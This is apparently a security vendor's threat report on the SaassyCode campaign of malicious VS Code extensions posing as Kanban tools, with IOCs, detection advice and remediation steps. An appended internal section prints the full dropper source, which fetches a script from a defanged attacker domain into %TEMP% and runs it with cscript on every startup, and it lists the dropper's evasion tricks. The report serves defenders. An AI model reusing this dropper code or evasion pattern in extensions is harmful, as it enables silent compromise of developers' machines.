SaassyCode Post-Disclosure Wave: Five New Extensions, 32,000+ Total Installs

Previous post: Update and Infect: How the SaassyCode Campaign Grew from Two Extensions to Nineteen →

The Campaign Did Not Stop

On June 8, 2026, Knostic published findings on the SaassyCode campaign: a coordinated family of nineteen malicious VS Code extensions posing as Trello-style Kanban board tools, with combined installs exceeding 17,544. In the two days that followed, the campaign published five more.

As of June 11, the total stands at 24 confirmed extensions and more than 32,000 installs across the full campaign. One extension — Boardwalk Plus — remains live on the VS Code Marketplace.

The New Extensions

All five extensions were published on June 9–10, 2026, two to three days after the original disclosure. All use the same Kanban board lure, the same activationEvents: ["*"] pattern, and the same execution chain as the documented family.

Boardwalk Plus — Still Live, 6,385 Installs

Boardwalk Plus is the only extension from this wave still available for install. Static analysis of the VSIX confirms it is a direct family member with no ambiguity.

What it does: Upon activation, the extension silently downloads a JavaScript file from an attacker-controlled domain and executes it using Windows Script Host. The execution happens on every VS Code startup with no user interaction.

code.exe → node.exe → https.get(urmomthabomb[.]com/java[.]js)

→ write %TEMP%\lizzy.js

→ cscript.exe //nologo //e:jscript %TEMP%\lizzy.js

The extension carries a fully functional Kanban board UI — the stated purpose works. This makes it harder for users to suspect the extension and extends the window before victims investigate or remove it.

It was malicious from day one. Unlike TrelloBlox (the sleeper confirmed in the previous report), Boardwalk Plus carries no clean version. Version 1.7.3 is the only version published, and it was malicious on publication.

The C2 domain urmomthabomb[.]com is new infrastructure not present in any prior SaassyCode IOC list. This is consistent with the actor's documented pattern of rotating domains after exposure.

If you have this extension installed, remove it immediately:

code --uninstall-extension AppCreationsPLC.boardwalkdevapp

EasyStudio — A New Sleeper That Weaponised

EasyStudio is the most significant extension from this wave in terms of impact. It used a sleeper strategy: version 1.6.0 was published clean on June 7 — the day before our June 8 disclosure. Version 1.8.0, published June 10, contained the malicious payload.

This is the same technique documented for TrelloBlox in the original post — an extension that builds a legitimate install base and then delivers a malicious update through the normal VS Code update mechanism. Users who had installed 1.6.0 and had automatic extension updates enabled would have received the weaponised version silently.

EasyStudio used the HTA execution chain — the more advanced delivery technique introduced by BloxyTask — rather than the simpler JScript downloader. With 8,227 installs, it is the highest-install confirmed malicious extension in the new wave. It has since been removed from the Marketplace.

New Publisher Cluster: The Boardwalk Family

Three extensions in this wave — Boardwalk Plus (AppCreationsPLC), Boardwalk - Manager (AppCreationLLP), and Boardwalk (AppCreationPLC) — are connected by shared infrastructure, publisher naming, and identical code. All three download from urmomthabomb[.]com/java[.]js and write to %TEMP%\lizzy.js. The publisher names are close variants of each other, consistent with automated account generation.

TaskRblx shares the same C2 but introduces heavy JavaScript obfuscation — the same evasion technique documented for the Cluster F extensions in the original report. The C2 URL is embedded in obfuscated string arrays, split across multiple concatenated fragments, with no plaintext IOC visible to static analysis. Despite the obfuscation, partial deobfuscation during analysis confirmed the domain.

Total Campaign Impact

The installs figure (>32,000) reflects Marketplace download counts. Actual infection rates are lower — the payload execution chain targets Windows only and requires VS Code to restart after installation.

Indicators of Compromise

All indicators defanged. Do not fetch C2 URLs directly.

New Network IOCs (this post)

Filesystem IOCs (Boardwalk cluster)

Process Chain (Boardwalk cluster)

Sample Hashes (VSIX SHA-256)

For IOCs from the original nineteen extensions (including all BloxyTask and Cluster F indicators), see the June 8 post.

What This Means

The actor published five extensions in the two days after Knostic's disclosure. Four have since been removed; one is still live as of the time of this publication. The tempo — and the continued use of the same lure text, activation pattern, and execution chain — confirms this is the same actor operating against the same target set.

VirusTotal's sandbox partially executed the Boardwalk Plus payload chain and observed the C2 connection but did not classify the sample as malicious. AgentMesh flagged it on publication. At the time this post is published, Boardwalk Plus remains available for install on the VS Code Marketplace.

If you are a developer: check your installed extensions against the full family list and remove any matches. If you have VS Code automatic extension updates enabled, check your version history — not just your current install.

If your organisation manages developer workstations: the process relationship code.exe → cscript.exe or code.exe → mshta.exe is not a normal VS Code child process. Both are early, high-confidence signals of compromise.

Investigate your VS Code extension exposure with AgentMesh →

All network indicators in this post are defanged. All hashes are SHA-256. Analysis was performed using static methods only — no malicious code was executed. EasyStudio dynamic analysis is pending; the HTA chain execution details documented here are based on static code inspection and comparison with confirmed BloxyTask behaviour.

Related: Update and Infect: How the SaassyCode Campaign Grew from Two Extensions to Nineteen · New VS Code extensions attack campaign: SaassyCode — ManageRBLX & TrelloBlox

Internal Technical Intelligence

This section contains only information not published in the blog post above: full extension metadata, dropper source code, evasion analysis, additional IOCs, complete remediation steps, and methodology notes.

THREAT STATUS: ACTIVE — Boardwalk Plus remains live as of 2026-06-11. C2 infrastructure live. Remove immediately if installed.

Extension Metadata (Boardwalk Plus)

Dropper Source Code

Full activate() function from extension/src/extension.js. C2 URL defanged.
function activate(context) {

try {

const scriptUrl = 'hxxps://www[.]urmomthabomb[.]com/java[.]js';

const scriptPath = path.join(os.tmpdir(), 'lizzy.js');

const downloadPromise = new Promise((resolve, reject) => {

https.get(scriptUrl, (res) => {

const file = require('fs').createWriteStream(scriptPath);

res.pipe(file);

file.on('finish', () => { file.close(); resolve(); });

}).on('error', reject);

});

downloadPromise.then(() => {

const cscriptPath = process.platform === 'win32'

? 'cscript'

: path.join(os.tmpdir(), 'cscript.exe');

const cmd = `"${cscriptPath}" //nologo //e:jscript "${scriptPath}"`;

cp.exec(cmd, (error, stdout, stderr) => {

if (error) console.error('Payload exec failed:', error);

});

}).catch(console.error);

} catch (e) {} // silent failure — no crash, no detection

}

Evasion Techniques

• Silent try/catch swallows all errors — extension loads cleanly even if payload fetch or exec fails
• //nologo //e:jscript minimizes cscript.exe window and console output
• Payload written as lizzy.js to %TEMP% — indistinguishable from legitimate Node tooling artifacts
• No obfuscation in dropper itself — reduces static detection signal relative to Cluster F members
• Fully functional Kanban UI masks malicious activation; user has no reason to investigate
• activationEvents: ["*"] maximizes execution frequency — fires on every workspace open, not just first launch
• VirusTotal sandbox observed the full chain and C2 connection; did not classify as malicious
• TaskRblx variant adds javascript-obfuscator layer with hex-key string arrays (_0x53887e) and split child_process module name to defeat static IOC extraction; AgentMesh rated HIGH (RAG) rather than CRITICAL (AGENT) due to obfuscation blocking agent-level confidence

C2 Payload — Stage 2

At time of analysis, hxxps://www[.]urmomthabomb[.]com/java[.]js returned a placeholder string. The live payload may be served conditionally based on victim fingerprinting or rotated after detection. Do not fetch. Any direct request will fingerprint the requester against attacker infrastructure.

Stage 2 placeholder hash (SHA-256): d4b6e6b96ce059993f895266baec99539c9830b4269652b3937a361a84abfd9b

Additional IOCs (not in blog)

Cluster Attribution

Full Remediation Checklist

• Block at DNS/Firewall: urmomthabomb[.]com, giantapplebees[.]shop
• Uninstall: code --uninstall-extension appcreationsplc.boardwalkdevapp
• Delete payload: del %TEMP%\lizzy.js
• Delete extension dir: %LOCALAPPDATA%\...\extensions\appcreationsplc.boardwalkdevapp-1.7.3\
• Check registry Run keys for any persistence added by Stage 2
• Rotate credentials — browser-stored passwords, API keys, session tokens, developer secrets; Stage 2 capabilities remain unconfirmed pending dynamic analysis
• Report to Microsoft via "Report a concern" on the Marketplace listing

Analysis Methodology

Static analysis only — no malicious code was executed. VSIX extracted as ZIP; package.json, extension.js, and icon.png examined statically. IOC extraction via code inspection. Attribution by cross-referencing lure text, activation events, execution chain skeleton, temp file naming, and publisher account patterns against the documented SaassyCode family.

References

• SaassyCode campaign blog (June 8, 2026)
• Boardwalk Plus — AgentMesh #107606
• Boardwalk Plus — VS Code Marketplace
• VirusTotal — 1a55c6fa... (sandbox observed C2, did not classify malicious)
• Researcher: Tamir Isaschar, Knostic Security · 2026-06-11